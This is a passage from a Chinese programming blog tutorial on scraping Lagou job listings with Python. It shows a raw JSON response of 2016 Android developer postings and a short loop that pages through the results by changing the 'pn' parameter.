17:57:43","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1387825,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业项目。优质福利待遇+期权","industryField":"移动互联网 · 医疗健康","score":1344,"district":"江干区","companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":5,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874263000,"positonTypesMap":null,"hrScore":74,"flowScore":153,"showCount":1312,"pvScore":66.87818057124453,"plus":"是","businessZones":["四季青","景芳"],"publisherId":3655492,"loginTime":1462873104000,"appShow":573,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:49:47","companyId":15071,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州短趣网络传媒技术有限公司","city":"杭州","salary":"10k-20k","financeStage":"成长型(A轮)","positionId":1803257,"companyLogo":"image2/M00/0B/80/CgpzWlYYse2AJgc0AABG9iSEWAE052.jpg","positionFirstType":"技术","companyName":"短趣网","positionAdvantage":"高额项目奖金,行业内有竞争力的薪资水平","industryField":"移动互联网 · 社交网络","score":1343,"district":null,"companyLabelList":["绩效奖金","年终分红","五险一金","通讯津贴"],"deliverCount":1,"leaderName":"王强宇","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":28,"imstate":"today","createTimeSort":1462859387000,"positonTypesMap":null,"hrScore":68,"flowScore":178,"showCount":652,"pvScore":32.82081357576065,"plus":"否","businessZones":null,"publisherId":4362468,"loginTime":1462870318000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"13:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 13:55:08","companyId":28422,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"成都品果科技有限公司","city":"北京","salary":"18k-30k","financeStage":"成长型(B轮)","positionId":290875,"companyLogo":"i/image/M00/02/F3/Cgp3O1ah7FuAbSnkAACMlcPiWXk393.png","positionFirstType":"技术","companyName":"camera360","positionAdvantage":"高大上的福利待遇、发展前景等着你哦!","industryField":"移动互联网","score":1339,"district":"海淀区","companyLabelList":["年终分红","绩效奖金","年底双薪","五险一金"],"deliverCount":6,"leaderName":"徐灏","companySize":"15-50人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462859708000,"positonTypesMap":null,"hrScore":80,"flowScore":188,"showCount":1199,"pvScore":19.745453118211834,"plus":"是","businessZones":["中关村","北京大学","苏州街"],"publisherId":389753,"loginTime":1462866640000,"appShow":0,"calcScore":false,"showOrder":1433137697136,"haveDeliver":false,"orderBy":71,"adWord":0,"formatCreateTime":"13:55发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 17:57:55","companyId":89004,"positionName":"Android","positionType":"移动开发","workYear":"不限","education":"学历不限","jobNature":"全职","companyShortName":"温州康宁医院股份有限公司","city":"杭州","salary":"10k-20k","financeStage":"上市公司","positionId":1410975,"companyLogo":"i/image/M00/02/C2/CgqKkVabp--APWTjAACHHJJxyPc207.png","positionFirstType":"技术","companyName":"的的心理","positionAdvantage":"上市公司内部创业团队","industryField":"移动互联网 
· 医疗健康","score":1335,"district":null,"companyLabelList":["年底双薪","股票期权","带薪年假","招募合伙人"],"deliverCount":9,"leaderName":"杨怡","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462874275000,"positonTypesMap":null,"hrScore":74,"flowScore":144,"showCount":2085,"pvScore":77.9570832081189,"plus":"是","businessZones":null,"publisherId":3655492,"loginTime":1462873104000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"17:57发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-09 09:46:32","companyId":113895,"positionName":"Android开发工程师","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"北京互动金服科技有限公司","city":"北京","salary":"15k-25k","financeStage":"成长型(不需要融资)","positionId":1473342,"companyLogo":"i/image/M00/03/D8/CgqKkVbEA_uAe1k4AAHTfy3RxPY812.jpg","positionFirstType":"技术","companyName":"互动科技","positionAdvantage":"五险一金 补充医疗 年终奖 福利津贴","industryField":"移动互联网 · O2O","score":1326,"district":"海淀区","companyLabelList":,"deliverCount":32,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462758392000,"positonTypesMap":null,"hrScore":82,"flowScore":153,"showCount":3741,"pvScore":67.01698353391613,"plus":"是","businessZones":["白石桥","魏公村","万寿寺","白石桥","魏公村","万寿寺"],"publisherId":3814477,"loginTime":1462874842000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"1天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 16:50:51","companyId":23999,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京智鹤电子科技有限公司","city":"长沙","salary":"8k-12k","financeStage":"成长型(A轮)","positionId":1804917,"companyLogo":"image1/M00/35/EB/CgYXBlWc5KGAVeL8AAAOi4lPhWU502.jpg","positionFirstType":"技术","companyName":"智鹤科技","positionAdvantage":"弹性工作制 技术氛围浓厚","industryField":"移动互联网","score":1322,"district":null,"companyLabelList":["股票期权","绩效奖金","专项奖金","年终分红"],"deliverCount":1,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":0,"imstate":"disabled","createTimeSort":1462870251000,"positonTypesMap":null,"hrScore":62,"flowScore":191,"showCount":283,"pvScore":15.939035855045429,"plus":"否","businessZones":null,"publisherId":282621,"loginTime":1462869967000,"appShow":0,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"16:50发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-08 23:12:56","companyId":24287,"positionName":"android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"杭州腾展科技有限公司","city":"杭州","salary":"15k-22k","financeStage":"成熟型(D轮及以上)","positionId":1197868,"companyLogo":"image1/M00/0B/7D/Cgo8PFTzIBOAEd2dAACMq9tQoMA797.png","positionFirstType":"技术","companyName":"腾展叮咚(Dingtone)","positionAdvantage":"每半年调整薪资,今年上市!","industryField":"移动互联网 · 社交网络","score":1322,"district":"西湖区","companyLabelList":["出国旅游","股票期权","精英团队","强悍的创始人"],"deliverCount":9,"leaderName":"魏松祥(Steve 
Wei)","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462720376000,"positonTypesMap":null,"hrScore":71,"flowScore":137,"showCount":3786,"pvScore":87.51582865460942,"plus":"是","businessZones":["文三路","古荡","高新文教区"],"publisherId":2946659,"loginTime":1462891920000,"appShow":940,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"2天前发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:38:43","companyId":19875,"positionName":"Android","positionType":"移动开发","workYear":"3-5年","education":"本科","jobNature":"全职","companyShortName":"维沃移动通信有限公司","city":"南京","salary":"12k-24k","financeStage":"初创型(未融资)","positionId":938099,"companyLogo":"image1/M00/00/25/Cgo8PFTUWH-Ab57wAABKOdLbNuw116.png","positionFirstType":"技术","companyName":"vivo","positionAdvantage":"vivo,追求极致","industryField":"移动互联网","score":1320,"district":"建邺区","companyLabelList":["年终分红","五险一金","带薪年假","年度旅游"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"2000人以上","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462844323000,"positonTypesMap":null,"hrScore":57,"flowScore":149,"showCount":981,"pvScore":72.14107985481958,"plus":"是","businessZones":["沙洲","小行","赛虹桥"],"publisherId":302876,"loginTime":1462871424000,"appShow":353,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":66,"adWord":0,"formatCreateTime":"09:38发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:49:59","companyId":20473,"positionName":"安卓开发工程师","positionType":"移动开发","workYear":"3-5年","education":"大专","jobNature":"全职","companyShortName":"广州棒谷网络科技有限公司","city":"广州","salary":"8k-15k","financeStage":"成长型(A轮)","positionId":1733545,"companyLogo":"image1/M00/0F/36/Cgo8PFT9AgGAciySAAA1THfEIAE433.jpg","positionFirstType":"技术","companyName":"广州棒谷网络科技有限公司","positionAdvantage":"五险一金 大平台 带薪休假","industryField":"电子商务","score":1320,"district":null,"companyLabelList":["项目奖金","绩效奖金","年终奖","五险一金"],"deliverCount":15,"leaderName":"大邹","companySize":"500-2000人","randomScore":0,"countAdjusted":false,"relScore":980,"adjustScore":48,"imstate":"today","createTimeSort":1462844999000,"positonTypesMap":null,"hrScore":79,"flowScore":144,"showCount":3943,"pvScore":77.78928844199473,"plus":"是","businessZones":null,"publisherId":235413,"loginTime":1462878251000,"appShow":1562,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":69,"adWord":0,"formatCreateTime":"09:49发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-04 11:41:59","companyId":87117,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"本科","jobNature":"全职","companyShortName":"南京信通科技有限责任公司","city":"南京","salary":"10k-12k","financeStage":"成长型(不需要融资)","positionId":966059,"companyLogo":"image1/M00/3F/51/CgYXBlXASfuADyOsAAA_na14zho635.jpg?cc=0.6724986131303012","positionFirstType":"技术","companyName":"联创集团信通科技","positionAdvantage":"提供完善的福利和薪酬晋升制度","industryField":"移动互联网 · 
教育","score":1320,"district":"鼓楼区","companyLabelList":["节日礼物","带薪年假","补充医保","补充子女医保"],"deliverCount":4,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462333319000,"positonTypesMap":null,"hrScore":88,"flowScore":143,"showCount":3161,"pvScore":79.41660570401937,"plus":"是","businessZones":["虎踞路","龙江","西桥"],"publisherId":2230973,"loginTime":1462871511000,"appShow":711,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":41,"adWord":0,"formatCreateTime":"2016-05-04","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 09:26:58","companyId":103051,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"浙江米果网络股份有限公司","city":"杭州","salary":"12k-22k","financeStage":"成长型(A轮)","positionId":1233873,"companyLogo":"image2/M00/10/DF/CgqLKVYwKQSAR2p4AAJAM590SJM137.png?cc=0.17502541467547417","positionFirstType":"技术","companyName":"米果小站","positionAdvantage":"充分的发展成长空间","industryField":"移动互联网","score":1320,"district":"滨江区","companyLabelList":["年底双薪","股票期权","午餐补助","五险一金"],"deliverCount":5,"leaderName":"暂没有填写","companySize":"150-500人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"disabled","createTimeSort":1462843618000,"positonTypesMap":null,"hrScore":72,"flowScore":137,"showCount":1582,"pvScore":87.93158026917071,"plus":"是","businessZones":["江南","长河","西兴"],"publisherId":2992735,"loginTime":1462889479000,"appShow":312,"calcScore":false,"showOrder":0,"haveDeliver":false,"orderBy":63,"adWord":0,"formatCreateTime":"09:26发布","totalCount":0,"searchScore":0.0},{"createTime":"2016-05-10 10:01:39","companyId":70044,"positionName":"Android","positionType":"移动开发","workYear":"1-3年","education":"大专","jobNature":"全职","companyShortName":"武汉平行世界网络科技有限公司","city":"武汉","salary":"9k-13k","financeStage":"初创型(天使轮)","positionId":664813,"companyLogo":"image2/M00/00/3E/CgqLKVXdccSAQE91AACv-6V33Vo860.jpg","positionFirstType":"技术","companyName":"平行世界","positionAdvantage":"弹性工作、带薪年假、待遇优厚、3号线直达","industryField":"电子商务 · 文化娱乐","score":1320,"district":"蔡甸区","companyLabelList":["年底双薪","待遇优厚","专项奖金","带薪年假"],"deliverCount":18,"leaderName":"暂没有填写","companySize":"50-150人","randomScore":0,"countAdjusted":false,"relScore":1000,"adjustScore":48,"imstate":"today","createTimeSort":1462845699000,"positonTypesMap":null,"hrScore":76,"flowScore":128,"showCount":1934,"pvScore":99.6001810598155,"plus":"是","businessZones":["沌口"],"publisherId":1694134,"loginTime":1462892151000,"appShow":759,"calcScore":false,"showOrder":1433141412915,"haveDeliver":false,"orderBy":68,"adWord":0,"formatCreateTime":"10:01发布","totalCount":0,"searchScore":0.0}]}}}
Click JSON under XHR and you can see the data the browser received. Isn't it exactly the same as what the Python program fetched above?
 

[Screenshot: dom_data.jpg]

 
Simple, isn't it?
 
What if you want the data from page 2 or page 3?
 
Just change the value of pn in the payload:
post_data = {'first':'true','kd':'Android','pn':'2'}  # fetch page 2

To fetch everything, just wrap the request in a loop, as sketched below.
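
A minimal sketch of such a loop, assuming the same truncated endpoint as above and using the totalCount and pageSize values from the first response to bound the page range; the one-second pause between requests is just a politeness guess, not something the site documents:

import math
import time

import requests

url = "http://www.lagou.com/jobs/posi..."  # endpoint truncated in the original post

# Page 1 tells us how many records and pages exist in total.
first_page = requests.post(url, data={'first': 'true', 'kd': 'Android', 'pn': '1'}).json()
position_result = first_page['content']['positionResult']
total_pages = math.ceil(position_result['totalCount'] / position_result['pageSize'])

# Collect page 1, then walk the remaining pages by bumping pn.
all_positions = list(position_result['result'])
for pn in range(2, total_pages + 1):
    resp = requests.post(url, data={'first': 'true', 'kd': 'Android', 'pn': str(pn)})
    all_positions.extend(resp.json()['content']['positionResult']['result'])
    time.sleep(1)  # brief pause between requests

print(len(all_positions))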
 
All rights reserved. Please credit the source when reposting: www.30daydo.com